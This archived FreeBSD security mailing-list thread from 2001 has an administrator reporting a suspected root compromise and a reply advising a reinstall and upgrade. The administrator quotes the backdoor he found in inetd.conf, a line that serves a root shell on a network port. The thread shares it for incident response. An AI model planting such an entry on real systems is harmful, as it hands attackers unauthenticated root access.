NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > FreeBSD Security> 2001-11

From: ksematwawa.eahd.or.ug
Date: Thu Nov 01 2001 - 08:58:38 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

reinstall and while you're at it. Upgrade to the latest stable version
using cvs.

Noah.
On Thu, 1 Nov 2001, Ralph Huntington wrote:

> I have that sinking feeling. I discovered this line at the end of
> inetd.conf on one of our servers:
>
> dlip stream tcp nowait root /bin/sh sh -i
>
> Looks like a root compromise. Sure enough, telnet'ing to the dlip port
> provides what *looks* like a root shell, but I don't seem to be able to do
> anything with it. Pretty mysterious.
>
> Can anyone offer a clue? Thanks in advance, Ralph
>
>
>
>
> To Unsubscribe: send mail to majordomoFreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

To Unsubscribe: send mail to majordomoFreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]